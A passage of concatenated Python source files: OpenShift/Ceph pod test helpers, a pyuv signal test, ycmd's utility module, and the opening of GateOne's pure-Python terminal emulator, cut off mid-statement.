they changed during each iteration. timeout (int): time to wait for pod statuses to change sleep (int): Time in seconds to sleep between attempts Returns: bool: True, if the pod statuses have changed. False, otherwise """ if current_statuses is None: # If 'current_statuses' is None the default value will be the ready statues current_statuses = [constants.STATUS_RUNNING, constants.STATUS_COMPLETED] try: for pod_objs in TimeoutSampler( timeout=timeout, sleep=sleep, func=get_pod_objs, namespace=namespace, pod_names=pod_names, ): ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) if len(pod_objs) < len(pod_names): pod_names_found_set = {p.name for p in pod_objs} pod_names_not_found = list(set(pod_names) - pod_names_found_set) logger.info(f"Some of the pods have not found: {pod_names_not_found}") return True for p in pod_objs: try: pod_status = ocp_pod_obj.get_resource_status(p.name) except CommandFailed as ex: logger.info( f"Can't get the status of the pod {p.name} due to the error: {ex}" ) continue if pod_status not in current_statuses: logger.info( f"The status of the pod '{p.name}' has changed to '{pod_status}'" ) return True except TimeoutExpiredError: logging.info(f"The status of the pods did not change after {timeout} seconds") return False def get_rook_ceph_pod_names(): """ Get all the rook ceph pod names Returns: list: List of the rook ceph pod names """ rook_ceph_pod_names = get_pod_name_by_pattern("rook-ceph-") # Exclude the rook ceph pod tools because it creates by OCS and not rook ceph operator return [ pod_name for pod_name in rook_ceph_pod_names if not pod_name.startswith("rook-ceph-tools-") ] def get_mon_pod_id(mon_pod): """ Get the mon pod id Args: mon_pod (ocs_ci.ocs.resources.pod.Pod): The mon pod object Returns: str: The mon pod id """ return mon_pod.get().get("metadata").get("labels").get("ceph_daemon_id") def delete_all_osd_removal_jobs(namespace=defaults.ROOK_CLUSTER_NAMESPACE): """ Delete all the osd removal jobs in a specific namespace Args: namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: bool: True, if all the jobs deleted successfully. False, otherwise """ result = True osd_removal_jobs = get_jobs_with_prefix("ocs-osd-removal-", namespace=namespace) for osd_removal_job in osd_removal_jobs: osd_removal_job.delete() try: osd_removal_job.ocp.wait_for_delete(resource_name=osd_removal_job.name) except TimeoutError: logger.warning( f"{osd_removal_job.name} job did not get deleted successfully" ) result = False return result def get_crashcollector_pods( crashcollector_label=constants.CRASHCOLLECTOR_APP_LABEL, namespace=None ): """ Fetches info about crashcollector pods in the cluster Args: crashcollector_label (str): label associated with mon pods (default: defaults.CRASHCOLLECTOR_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of crashcollector pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] crashcollectors = get_pods_having_label(crashcollector_label, namespace) return [Pod(**crashcollector) for crashcollector in crashcollectors]
test_signal.py
import os import signal import time import threading import unittest from common import platform_skip, TestCase import pyuv @platform_skip(["win32"]) class SignalTest(TestCase): def signal_cb(self, handle, signum): self.assertEqual(signum, signal.SIGUSR1) self.signal_cb_called += 1 self.async.send() def async_cb(self, async): self.async_cb_called += 1 self.async.close() self.signal_h.close() def test_signal1(self): self.async_cb_called = 0 self.signal_cb_called = 0 self.async = pyuv.Async(self.loop, self.async_cb) self.signal_h = pyuv.Signal(self.loop) self.signal_h.start(self.signal_cb, signal.SIGUSR1) thread = threading.Thread(target=self.loop.run) thread.start() os.kill(os.getpid(), signal.SIGUSR1) thread.join() self.assertEqual(self.async_cb_called, 1) self.assertEqual(self.signal_cb_called, 1) @platform_skip(["win32"]) class MultiLoopSignalTest(unittest.TestCase): def setUp(self): self.lock = threading.Lock() self.signal_cb_called = 0 def signal_cb(self, handle, signum): self.assertEqual(signum, signal.SIGUSR1) with self.lock: self.signal_cb_called += 1 handle.close() def run_loop(self): loop = pyuv.Loop() signal_h = pyuv.Signal(loop) signal_h.start(self.signal_cb, signal.SIGUSR1) loop.run() def test_multi_loop_signals(self): threads = [threading.Thread(target=self.run_loop) for x in range(25)] [t.start() for t in threads] # Wait until threads have started time.sleep(1) os.kill(os.getpid(), signal.SIGUSR1) [t.join() for t in threads] self.assertEqual(self.signal_cb_called, 25) if __name__ == '__main__': unittest.main(verbosity=2)
utils.py
# encoding: utf-8 # # Copyright (C) 2011-2019 ycmd contributors # # This file is part of ycmd. # # ycmd is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # ycmd is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with ycmd. If not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import # Not installing aliases from python-future; it's unreliable and slow. from builtins import * # noqa from future.utils import PY2, native import copy import json import logging import os import socket import subprocess import sys import tempfile import time import threading LOGGER = logging.getLogger( 'ycmd' ) ROOT_DIR = os.path.normpath( os.path.join( os.path.dirname( __file__ ), '..' ) ) DIR_OF_THIRD_PARTY = os.path.join( ROOT_DIR, 'third_party' ) LIBCLANG_DIR = os.path.join( DIR_OF_THIRD_PARTY, 'clang', 'lib' ) # Idiom to import pathname2url, url2pathname, urljoin, and urlparse on Python 2 # and 3. By exposing these functions here, we can import them directly from this # module: # # from ycmd.utils import pathname2url, url2pathname, urljoin, urlparse # if PY2: from collections import Mapping from urlparse import urljoin, urlparse, unquote from urllib import pathname2url, url2pathname, quote else: from collections.abc import Mapping # noqa from urllib.parse import urljoin, urlparse, unquote, quote # noqa from urllib.request import pathname2url, url2pathname # noqa # We replace the re module with regex as it has better support for characters on # multiple code points. However, this module has a compiled component so we # can't import it in YCM if it is built for a different version of Python (e.g. # if YCM is running on Python 2 while ycmd on Python 3). We fall back to the re # module in that case. try: import regex as re except ImportError: # pragma: no cover import re # noqa # Creation flag to disable creating a console window on Windows. See # https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863.aspx CREATE_NO_WINDOW = 0x08000000 EXECUTABLE_FILE_MASK = os.F_OK | os.X_OK CORE_MISSING_ERROR_REGEX = re.compile( "No module named '?ycm_core'?" ) CORE_PYTHON2_ERROR_REGEX = re.compile( 'dynamic module does not define (?:init|module export) ' 'function \\(PyInit_ycm_core\\)|' 'Module use of python2[0-9]\\.dll conflicts with this version of Python\\.$' ) CORE_PYTHON3_ERROR_REGEX = re.compile( 'dynamic module does not define init function \\(initycm_core\\)|' 'Module use of python3[0-9]\\.dll conflicts with this version of Python\\.$' ) CORE_MISSING_MESSAGE = ( 'ycm_core library not detected; you need to compile it by running the ' 'build.py script. See the documentation for more details.' ) CORE_PYTHON2_MESSAGE = ( 'ycm_core library compiled for Python 2 but loaded in Python 3.' ) CORE_PYTHON3_MESSAGE = ( 'ycm_core library compiled for Python 3 but loaded in Python 2.' ) CORE_OUTDATED_MESSAGE = ( 'ycm_core library too old; PLEASE RECOMPILE by running the build.py script. ' 'See the documentation for more details.' ) # Exit statuses returned by the CompatibleWithCurrentCore function: # - CORE_COMPATIBLE_STATUS: ycm_core is compatible; # - CORE_UNEXPECTED_STATUS: unexpected error while loading ycm_core; # - CORE_MISSING_STATUS : ycm_core is missing; # - CORE_PYTHON2_STATUS : ycm_core is compiled with Python 2 but loaded with # Python 3; # - CORE_PYTHON3_STATUS : ycm_core is compiled with Python 3 but loaded with # Python 2; # - CORE_OUTDATED_STATUS : ycm_core version is outdated. # Values 1 and 2 are not used because 1 is for general errors and 2 has often a # special meaning for Unix programs. See # https://docs.python.org/2/library/sys.html#sys.exit CORE_COMPATIBLE_STATUS = 0 CORE_UNEXPECTED_STATUS = 3 CORE_MISSING_STATUS = 4 CORE_PYTHON2_STATUS = 5 CORE_PYTHON3_STATUS = 6 CORE_OUTDATED_STATUS = 7 # Python 3 complains on the common open(path).read() idiom because the file # doesn't get closed. So, a helper func. # Also, all files we read are UTF-8. def ReadFile( filepath ): with open( filepath, encoding = 'utf8' ) as f: return f.read() # Returns a file object that can be used to replace sys.stdout or sys.stderr def OpenForStdHandle( filepath ): # Need to open the file in binary mode on py2 because of bytes vs unicode. # If we open in text mode (default), then third-party code that uses `print` # (we're replacing sys.stdout!) with an `str` object on py2 will cause # tracebacks because text mode insists on unicode objects. (Don't forget, # `open` is actually `io.open` because of future builtins.) # Since this function is used for logging purposes, we don't want the output # to be delayed. This means no buffering for binary mode and line buffering # for text mode. See https://docs.python.org/2/library/io.html#io.open if PY2: return open( filepath, mode = 'wb', buffering = 0 ) return open( filepath, mode = 'w', buffering = 1 ) def MakeSafeFileNameString( s ): """Return a representation of |s| that is safe for use in a file name. Explicitly, returns s converted to lowercase with all non alphanumeric characters replaced with '_'.""" def is_ascii( c ): return ord( c ) < 128 return "".join( c if c.isalnum() and is_ascii( c ) else '_' for c in ToUnicode( s ).lower() ) def CreateLogfile( prefix = '' ): with tempfile.NamedTemporaryFile( prefix = prefix, suffix = '.log', delete = False ) as logfile: return logfile.name # Given an object, returns a str object that's utf-8 encoded. This is meant to # be used exclusively when producing strings to be passed to the C++ Python # plugins. For other code, you likely want to use ToBytes below. def ToCppStringCompatible( value ): if isinstance( value, str ): return native( value.encode( 'utf8' ) ) if isinstance( value, bytes ): return native( value ) return native( str( value ).encode( 'utf8' ) ) # Returns a unicode type; either the new python-future str type or the real # unicode type. The difference shouldn't matter. def ToUnicode( value ): if not value: return str() if isinstance( value, str ): return value if isinstance( value, bytes ): # All incoming text should be utf8 return str( value, 'utf8' ) return str( value ) # When lines is an iterable of all strings or all bytes, equivalent to # '\n'.join( ToUnicode( lines ) ) # but faster on large inputs. def JoinLinesAsUnicode( lines ): try: first = next( iter( lines ) ) except StopIteration: return str() if isinstance( first, str ): return ToUnicode( '\n'.join( lines ) ) if isinstance( first, bytes ): return ToUnicode( b'\n'.join( lines ) ) raise ValueError( 'lines must contain either strings or bytes.' ) # Consistently returns the new bytes() type from python-future. Assumes incoming # strings are either UTF-8 or unicode (which is converted to UTF-8). def ToBytes( value ): if not value: return bytes() # This is tricky. On py2, the bytes type from builtins (from python-future) is # a subclass of str. So all of the following are true: # isinstance(str(), bytes) # isinstance(bytes(), str) # But they don't behave the same in one important aspect: iterating over a # bytes instance yields ints, while iterating over a (raw, py2) str yields # chars. We want consistent behavior so we force the use of bytes(). if type( value ) == bytes: return value # This is meant to catch Python 2's native str type. if isinstance( value, bytes ): return bytes( value, encoding = 'utf8' ) if isinstance( value, str ): # On py2, with `from builtins import *` imported, the following is true: # # bytes(str(u'abc'), 'utf8') == b"b'abc'" # # Obviously this is a bug in python-future. So we work around it. Also filed # upstream at: https://github.com/PythonCharmers/python-future/issues/193 # We can't just return value.encode( 'utf8' ) on both py2 & py3 because on # py2 that *sometimes* returns the built-in str type instead of the newbytes # type from python-future. if PY2: return bytes( value.encode( 'utf8' ), encoding = 'utf8' ) else: return bytes( value, encoding = 'utf8' ) # This is meant to catch `int` and similar non-string/bytes types. return ToBytes( str( value ) ) def ByteOffsetToCodepointOffset( line_value, byte_offset ): """The API calls for byte offsets into the UTF-8 encoded version of the buffer. However, ycmd internally uses unicode strings. This means that when we need to walk 'characters' within the buffer, such as when checking for semantic triggers and similar, we must use codepoint offets, rather than byte offsets. This method converts the |byte_offset|, which is a utf-8 byte offset, into a codepoint offset in the unicode string |line_value|.""" byte_line_value = ToBytes( line_value ) return len( ToUnicode( byte_line_value[ : byte_offset - 1 ] ) ) + 1 def CodepointOffsetToByteOffset( unicode_line_value, codepoint_offset ): """The API calls for byte offsets into the UTF-8 encoded version of the buffer. However, ycmd internally uses unicode strings. This means that when we need to walk 'characters' within the buffer, such as when checking for semantic triggers and similar, we must use codepoint offets, rather than byte offsets. This method converts the |codepoint_offset| which is a unicode codepoint offset into an byte offset into the utf-8 encoded bytes version of |unicode_line_value|.""" # Should be a no-op, but in case someone passes a bytes instance. unicode_line_value = ToUnicode( unicode_line_value ) return len( ToBytes( unicode_line_value[ : codepoint_offset - 1 ] ) ) + 1 def GetUnusedLocalhostPort(): sock = socket.socket() # This tells the OS to give us any free port in the range [1024 - 65535] sock.bind( ( '', 0 ) ) port = sock.getsockname()[ 1 ] sock.close() return port def RemoveDirIfExists( dirname ): try: import shutil shutil.rmtree( dirname ) except OSError: pass def RemoveIfExists( filename ): try: os.remove( filename ) except OSError: pass def PathToFirstExistingExecutable( executable_name_list ): for executable_name in executable_name_list: path = FindExecutable( executable_name ) if path: return path return None def _GetWindowsExecutable( filename ): def _GetPossibleWindowsExecutable( filename ): pathext = [ ext.lower() for ext in os.environ.get( 'PATHEXT', '' ).split( os.pathsep ) ] base, extension = os.path.splitext( filename ) if extension.lower() in pathext: return [ filename ] else: return [ base + ext for ext in pathext ] for exe in _GetPossibleWindowsExecutable( filename ): if os.path.isfile( exe ): return exe return None # Check that a given file can be accessed as an executable file, so controlling # the access mask on Unix and if has a valid extension on Windows. It returns # the path to the executable or None if no executable was found. def GetExecutable( filename ): if OnWindows(): return _GetWindowsExecutable( filename ) if ( os.path.isfile( filename ) and os.access( filename, EXECUTABLE_FILE_MASK ) ): return filename return None # Adapted from https://hg.python.org/cpython/file/3.5/Lib/shutil.py#l1081 # to be backward compatible with Python2 and more consistent to our codebase. def FindExecutable( executable ): # If we're given a path with a directory part, look it up directly rather # than referring to PATH directories. This includes checking relative to the # current directory, e.g. ./script if os.path.dirname( executable ): return GetExecutable( executable ) paths = os.environ[ 'PATH' ].split( os.pathsep ) if OnWindows(): # The current directory takes precedence on Windows. curdir = os.path.abspath( os.curdir ) if curdir not in paths: paths.insert( 0, curdir ) for path in paths: exe = GetExecutable( os.path.join( path, executable ) ) if exe: return exe return None def ExecutableName( executable ): return executable + ( '.exe' if OnWindows() else '' ) def ExpandVariablesInPath( path ): # Replace '~' with the home directory and expand environment variables in # path. return os.path.expanduser( os.path.expandvars( path ) ) def OnWindows(): return sys.platform == 'win32' def OnCygwin(): return sys.platform == 'cygwin' def OnMac(): return sys.platform == 'darwin' def ProcessIsRunning( handle ): return handle is not None and handle.poll() is None def WaitUntilProcessIsTerminated( handle, timeout = 5 ): expiration = time.time() + timeout while True: if time.time() > expiration: raise RuntimeError( 'Waited process to terminate for {0} seconds, ' 'aborting.'.format( timeout ) ) if not ProcessIsRunning( handle ): return time.sleep( 0.1 ) def CloseStandardStreams( handle ): if not handle: return for stream in [ handle.stdin, handle.stdout, handle.stderr ]: if stream: stream.close() def IsRootDirectory( path, parent ): return path == parent def PathsToAllParentFolders( path ): folder = os.path.normpath( path ) if os.path.isdir( folder ): yield folder while True: parent = os.path.dirname( folder ) if IsRootDirectory( folder, parent ): break folder = parent yield folder def PathLeftSplit( path ): """Split a path as (head, tail) where head is the part before the first path separator and tail is everything after. If the path is absolute, head is the root component, tail everything else. If there is no separator, head is the whole path and tail the empty string.""" drive, path = os.path.splitdrive( path ) separators = '/\\' if OnWindows() else '/' path_length = len( path ) offset = 0 while offset < path_length and path[ offset ] not in separators: offset += 1 if offset == path_length: return drive + path, '' tail = path[ offset + 1 : ].rstrip( separators ) if offset == 0: return drive + path[ 0 ], tail return drive + path[ : offset ], tail # A wrapper for subprocess.Popen that fixes quirks on Windows. def SafePopen( args, **kwargs ): if OnWindows(): # We need this to start the server otherwise bad things happen. # See issue #637. if kwargs.get( 'stdin_windows' ) is subprocess.PIPE: kwargs[ 'stdin' ] = subprocess.PIPE # Do not create a console window kwargs[ 'creationflags' ] = CREATE_NO_WINDOW # Python 2 fails to spawn a process from a command containing unicode # characters on Windows. See https://bugs.python.org/issue19264 and # http://bugs.python.org/issue1759845. # Since paths are likely to contains such characters, we convert them to # short ones to obtain paths with only ascii characters. if PY2: args = ConvertArgsToShortPath( args ) kwargs.pop( 'stdin_windows', None ) return subprocess.Popen( args, **kwargs ) # We need to convert environment variables to native strings on Windows and # Python 2 to prevent a TypeError when passing them to a subprocess. def SetEnviron( environ, variable, value ): if OnWindows() and PY2: environ[ native( ToBytes( variable ) ) ] = native( ToBytes( value ) ) else: environ[ variable ] = value # Convert paths in arguments command to short path ones def ConvertArgsToShortPath( args ): def ConvertIfPath( arg ): if os.path.exists( arg ): return GetShortPathName( arg ) return arg if isinstance( args, str ) or isinstance( args, bytes ): return ConvertIfPath( args ) return [ ConvertIfPath( arg ) for arg in args ] # Get the Windows short path name. # Based on http://stackoverflow.com/a/23598461/200291 def GetShortPathName( path ): if not OnWindows(): return path from ctypes import windll, wintypes, create_unicode_buffer # Set the GetShortPathNameW prototype _GetShortPathNameW = windll.kernel32.GetShortPathNameW _GetShortPathNameW.argtypes = [ wintypes.LPCWSTR, wintypes.LPWSTR, wintypes.DWORD ] _GetShortPathNameW.restype = wintypes.DWORD output_buf_size = 0 while True: output_buf = create_unicode_buffer( output_buf_size ) needed = _GetShortPathNameW( path, output_buf, output_buf_size ) if output_buf_size >= needed: return output_buf.value else: output_buf_size = needed # Shim for imp.load_source so that it works on both Py2 & Py3. See upstream # Python docs for info on what this does. def LoadPythonSource( name, pathname ): if PY2: import imp try: return imp.load_source( name, pathname ) except UnicodeEncodeError: # imp.load_source doesn't handle non-ASCII characters in pathname. See # http://bugs.python.org/issue9425 source = ReadFile( pathname ) module = imp.new_module( name ) module.__file__ = pathname exec( source, module.__dict__ ) return module import importlib return importlib.machinery.SourceFileLoader( name, pathname ).load_module() def SplitLines( contents ): """Return a list of each of the lines in the unicode string |contents|.""" # We often want to get a list representation of a buffer such that we can # index all of the 'lines' within it. Python provides str.splitlines for this # purpose. However, this method not only splits on newline characters (\n, # \r\n, and \r) but also on line boundaries like \v and \f. Since old # Macintosh newlines (\r) are obsolete and Windows newlines (\r\n) end with a # \n character, we can ignore carriage return characters (\r) and only split # on \n. return contents.split( '\n' ) def GetCurrentDirectory(): """Returns the current directory as an unicode object. If the current directory does not exist anymore, returns the temporary folder instead.""" try: if PY2: return os.getcwdu() return os.getcwd() # os.getcwdu throws an OSError exception when the current directory has been # deleted while os.getcwd throws a FileNotFoundError, which is a subclass of # OSError. except OSError: return tempfile.gettempdir() def StartThread( func, *args ): thread = threading.Thread( target = func, args = args ) thread.daemon = True thread.start() return thread class HashableDict( Mapping ): """An immutable dictionary that can be used in dictionary's keys. The dictionary must be JSON-encodable; in particular, all keys must be strings.""" def __init__( self, *args, **kwargs ): self._dict = dict( *args, **kwargs ) def __getitem__( self, key ): return copy.deepcopy( self._dict[ key ] ) def __iter__( self ): return iter( self._dict ) def __len__( self ): return len( self._dict ) def __repr__( self ): return '<HashableDict %s>' % repr( self._dict ) def __hash__( self ): try: return self._hash except AttributeError: self._hash = json.dumps( self._dict, separators = ( ',', ':' ), sort_keys = True ).__hash__() return self._hash def __eq__( self, other ): return isinstance( other, HashableDict ) and self._dict == other._dict def __ne__( self, other ): return not self == other def ListDirectory( path ): try: # Path must be a Unicode string to get Unicode strings out of listdir. return os.listdir( ToUnicode( path ) ) except Exception: LOGGER.exception( 'Error while listing %s folder', path ) return [] def GetModificationTime( path ): try: return os.path.getmtime( path ) except OSError: LOGGER.exception( 'Cannot get modification time for path %s', path ) return 0 def ExpectedCoreVersion(): return int( ReadFile( os.path.join( ROOT_DIR, 'CORE_VERSION' ) ) ) def LoadYcmCoreDependencies(): for name in ListDirectory( LIBCLANG_DIR ): if name.startswith( 'libclang' ): libclang_path = os.path.join( LIBCLANG_DIR, name ) if os.path.isfile( libclang_path ): import ctypes ctypes.cdll.LoadLibrary( libclang_path ) return def ImportCore(): """Imports and returns the ycm_core module. This function exists for easily mocking this import in tests.""" import ycm_core as ycm_core return ycm_core def ImportAndCheckCore(): """Checks if ycm_core library is compatible and returns with an exit status.""" try: LoadYcmCoreDependencies() ycm_core = ImportCore() except ImportError as error: message = str( error ) if CORE_MISSING_ERROR_REGEX.match( message ): LOGGER.exception( CORE_MISSING_MESSAGE ) return CORE_MISSING_STATUS if CORE_PYTHON2_ERROR_REGEX.match( message ): LOGGER.exception( CORE_PYTHON2_MESSAGE ) return CORE_PYTHON2_STATUS if CORE_PYTHON3_ERROR_REGEX.match( message ): LOGGER.exception( CORE_PYTHON3_MESSAGE ) return CORE_PYTHON3_STATUS LOGGER.exception( message ) return CORE_UNEXPECTED_STATUS try: current_core_version = ycm_core.YcmCoreVersion() except AttributeError: LOGGER.exception( CORE_OUTDATED_MESSAGE ) return CORE_OUTDATED_STATUS if ExpectedCoreVersion() != current_core_version: LOGGER.error( CORE_OUTDATED_MESSAGE ) return CORE_OUTDATED_STATUS return CORE_COMPATIBLE_STATUS def GetClangResourceDir(): resource_dir = os.path.join( LIBCLANG_DIR, 'clang' ) for version in ListDirectory( resource_dir ): return os.path.join( resource_dir, version ) raise RuntimeError( 'Cannot find Clang resource directory.' ) CLANG_RESOURCE_DIR = GetClangResourceDir()
terminal.py
# -*- coding: utf-8 -*- # # Copyright 2011 Liftoff Software Corporation # # Meta __version__ = '1.1' __version_info__ = (1, 1) __license__ = "AGPLv3 or Proprietary (see LICENSE.txt)" __author__ = 'Dan McDougall <daniel.mcdougall@liftoffsoftware.com>' __doc__ = """\ About This Module ================= This crux of this module is the Terminal class which is a pure-Python implementation of the quintessential Unix terminal emulator. It does its best to emulate an xterm and along with that comes support for the majority of the relevant portions of ECMA-48. This includes support for emulating varous VT-* terminal types as well as the "linux" terminal type. The Terminal class's VT-* emulation support is not complete but it should suffice for most terminal emulation needs (e.g. all your typical command line programs should work wonderfully). If something doesn't look quite right or you need support for certain modes added please feel free to open a ticket on Gate One's issue tracker: https://github.com/liftoff/GateOne/issues Note that Terminal was written from scratch in order to be as fast as possible. It is extensively commented and implements some interesting patterns in order to maximize execution speed (most notably for things that loop). Some bits of code may seem "un-Pythonic" and/or difficult to grok but understand that this is probably due to optimizations. If you know "a better way" please feel free to submit a patch, open a ticket, or send us an email. There's a reason why open source software is a superior development model! Supported Emulation Types ------------------------- Without any special mode settings or parameters Terminal should effectively emulate the following terminal types: * xterm (the most important one) * ECMA-48/ANSI X3.64 * Nearly all the VT-* types: VT-52, VT-100, VT-220, VT-320, VT-420, and VT-520 * Linux console ("linux") If you want Terminal to support something else or it's missing a feature from any given terminal type please `let us know <https://github.com/liftoff/GateOne/issues/new>`_. We'll implement it! What Terminal Doesn't Do ------------------------ The Terminal class is meant to emulate the display portion of a given terminal. It does not translate keystrokes into escape sequences or special control codes--you'll have to take care of that in your application (or at the client-side like Gate One). It does, however, keep track of many keystroke-specific modes of operation such as Application Cursor Keys and the G0 and G1 charset modes *with* callbacks that can be used to notify your application when such things change. Special Considerations ---------------------- Many methods inside Terminal start with an underscore. This was done to indicate that such methods shouldn't be called directly (from a program that imported the module). If it was thought that a situation might arise where a method could be used externally by a controlling program, the underscore was omitted. Asynchronous Use ---------------- To support asynchronous usage (and make everything faster), Terminal was written to support extensive callbacks that are called when certain events are encountered. Here are the events and their callbacks: .. _callback_constants: ==================================== ================================================================================ Callback Constant (ID) Called when... ==================================== ================================================================================ :attr:`terminal.CALLBACK_SCROLL_UP` The terminal is scrolled up (back). :attr:`terminal.CALLBACK_CHANGED` The screen is changed/updated. :attr:`terminal.CALLBACK_CURSOR_POS` The cursor position changes. :attr:`terminal.CALLBACK_DSR` A Device Status Report (DSR) is requested (via the DSR escape sequence). :attr:`terminal.CALLBACK_TITLE` The terminal title changes (xterm-style) :attr:`terminal.CALLBACK_BELL` The bell character (^G) is encountered. :attr:`terminal.CALLBACK_OPT` The special optional escape sequence is encountered. :attr:`terminal.CALLBACK_MODE` The terminal mode setting changes (e.g. use alternate screen buffer). :attr:`terminal.CALLBACK_MESSAGE` The terminal needs to send the user a message (without messing with the screen). ==================================== ================================================================================ Note that CALLBACK_DSR is special in that it in most cases it will be called with arguments. See the code for examples of how and when this happens. Also, in most cases it is unwise to override CALLBACK_MODE since this method is primarily meant for internal use within the Terminal class. Using Terminal -------------- Gate One makes extensive use of the Terminal class and its callbacks. So that's a great place to look for specific examples (gateone.py and termio.py, specifically). Having said that, implementing Terminal is pretty straightforward:: >>> import terminal >>> term = terminal.Terminal(24, 80) >>> term.write("This text will be written to the terminal screen.") >>> term.dump() [u'This text will be written to the terminal screen. ', <snip> u' '] Here's an example with some basic callbacks: >>> def mycallback(): ... "This will be called whenever the screen changes." ... print("Screen update! Perfect time to dump the terminal screen.") ... print(term.dump()[0]) # Only need to see the top line for this demo =) ... print("Just dumped the screen.") >>> import terminal >>> term = terminal.Terminal(24, 80) >>> term.callbacks[term.CALLBACK_CHANGED] = mycallback >>> term.write("This should result in mycallback() being called") Screen update! Perfect time to dump the terminal screen. This should result in mycallback() being called Just dumped the screen. .. note:: In testing Gate One it was determined that it is faster to perform the conversion of a terminal screen to HTML on the server side than it is on the client side (via JavaScript anyway). About The Scrollback Bufffer ---------------------------- The Terminal class implements a scrollback buffer. Here's how it works: Whenever a :meth:`Terminal.scroll_up` event occurs, the line (or lines) that will be removed from the top of the screen will be placed into :attr:`Terminal.scrollback_buf`. Then whenever :meth:`Terminal.dump_html` is called the scrollback buffer will be returned along with the screen output and reset to an empty state. Why do this? In the event that a very large :meth:`Terminal.write` occurs (e.g. 'ps aux'), it gives the controlling program the ability to capture what went past the screen without some fancy tracking logic surrounding :meth:`Terminal.write`. More information about how this works can be had by looking at the :meth:`Terminal.dump_html` function itself. .. note:: There's more than one function that empties :attr:`Terminal.scrollback_buf` when called. You'll just have to have a look around =) Class Docstrings ================ """ # Import stdlib stuff import os, sys, re, logging, base64, codecs, unicodedata, tempfile, struct from io import BytesIO from array import array from datetime import datetime, timedelta from functools import partial from collections import defaultdict try: from itertools import imap, izip except ImportError: # Python3 uses map and zip instead imap = map izip = zip try: from collections import OrderedDict except ImportError: # Python <2.7 didn't have OrderedDict in collections try: from ordereddict import OrderedDict except ImportError: logging.error( "Error: Could not import OrderedDict. Please install it:") logging.error("\tsudo pip install ordereddict") logging.error( "...or download it from http://pypi.python.org/pypi/ordereddict") sys.exit(1) try: xrange = xrange except NameError: # Python 3 doesn't have xrange() xrange = range try: unichr = unichr except NameError: # Python 3 doesn't have unichr() unichr = chr try: basestring = basestring except NameError: # Python 3 doesn't have basestring basestring = (str, bytes) # Inernationalization support _ = str # So pyflakes doesn't complain import gettext gettext.install('terminal') # Globals _logged_pil_warning = False # Used so we don't spam the user with warnings _logged_mutagen_warning = False # Ditto CALLBACK_SCROLL_UP = 1 # Called after a scroll up event (new line) CALLBACK_CHANGED = 2 # Called after the screen is updated CALLBACK_CURSOR_POS = 3 # Called after the cursor position is updated # <waives hand in air> You are not concerned with the number 4 CALLBACK_DSR = 5 # Called when a DSR requires a response # NOTE: CALLBACK_DSR must accept 'response' as either the first argument or # as a keyword argument. CALLBACK_TITLE = 6 # Called when the terminal sets the window title CALLBACK_BELL = 7 # Called after ASCII_BEL is encountered. CALLBACK_OPT = 8 # Called when we encounter the optional ESC sequence # NOTE: CALLBACK_OPT must accept 'chars' as either the first argument or as # a keyword argument. CALLBACK_MODE = 9 # Called when the terminal mode changes (e.g. DECCKM) CALLBACK_RESET = 10 # Called when a terminal reset (^[[!p) is encountered CALLBACK_LEDS = 11 # Called when the state of the LEDs changes # Called when the terminal emulator encounters a situation where it wants to # tell the user about something (say, an error decoding an image) without # interfering with the terminal's screen. CALLBACK_MESSAGE = 12 # These are for HTML output: RENDITION_CLASSES = defaultdict(lambda: None, { 0: 'reset', # Special: Return everything to defaults 1: 'bold', 2: 'dim', 3: 'italic', 4: 'underline', 5: 'blink', 6: 'fastblink', 7: 'reverse', 8: 'hidden', 9: 'strike', 10: 'fontreset', # NOTE: The font renditions don't do anything right now 11: 'font11', # Mostly because I have no idea what they are supposed to look 12: 'font12', # like. 13: 'font13', 14: 'font14', 15: 'font15', 16: 'font16', 17: 'font17', 18: 'font18', 19: 'font19', 20: 'fraktur', 21: 'boldreset', 22: 'dimreset', 23: 'italicreset', 24: 'underlinereset', 27: 'reversereset', 28: 'hiddenreset', 29: 'strikereset', # Foregrounds 30: 'f0', # Black 31: 'f1', # Red 32: 'f2', # Green 33: 'f3', # Yellow 34: 'f4', # Blue 35: 'f5', # Magenta 36: 'f6', # Cyan 37: 'f7', # White 38: '', # 256-color support uses this like so: \x1b[38;5;<color num>sm 39: 'foregroundreset', # Special: Set FG to default # Backgrounds 40: 'b0', # Black 41: 'b1', # Red 42: 'b2', # Green 43: 'b3', # Yellow 44: 'b4', # Blue 45: 'b5', # Magenta 46: 'b6', # Cyan 47: 'b7', # White 48: '', # 256-color support uses this like so: \x1b[48;5;<color num>sm 49: 'backgroundreset', # Special: Set BG to default 51: 'frame', 52: 'encircle', 53: 'overline', 60: 'rightline', 61: 'rightdoubleline', 62: 'leftline', 63: 'leftdoubleline', # aixterm colors (aka '16 color support'). They're supposed to be 'bright' # versions of the first 8 colors (hence the 'b'). # 'Bright' Foregrounds 90: 'bf0', # Bright black (whatever that is =) 91: 'bf1', # Bright red 92: 'bf2', # Bright green 93: 'bf3', # Bright yellow 94: 'bf4', # Bright blue 95: 'bf5', # Bright magenta 96: 'bf6', # Bright cyan 97: 'bf7', # Bright white # TODO: Handle the ESC sequence that sets the colors from 90-87 (e.g. ESC]91;orange/brown^G) # 'Bright' Backgrounds 100: 'bb0', # Bright black 101: 'bb1', # Bright red 102: 'bb2', # Bright green 103: 'bb3', # Bright yellow 104: 'bb4', # Bright blue 105: 'bb5', # Bright magenta 106: 'bb6', # Bright cyan 107: 'bb7' # Bright white }) # Generate the dict of 256-color (xterm) foregrounds and backgrounds for i in xrange(256): RENDITION_CLASSES[(i+1000)] = "fx%s" % i RENDITION_CLASSES[(i+10000)] = "bx%s" % i del i # Cleanup RESET_CLASSES = set([ 'backgroundreset', 'boldreset', 'dimreset', 'italicreset', 'underlinereset', 'reversereset', 'hiddenreset', 'strikereset', 'resetfont' ]) try: unichr(0x10000) # Will throw a ValueError on narrow Python builds SPECIAL = 1048576 # U+100000 or unichr(SPECIAL) (start of Plane 16) except: SPECIAL = 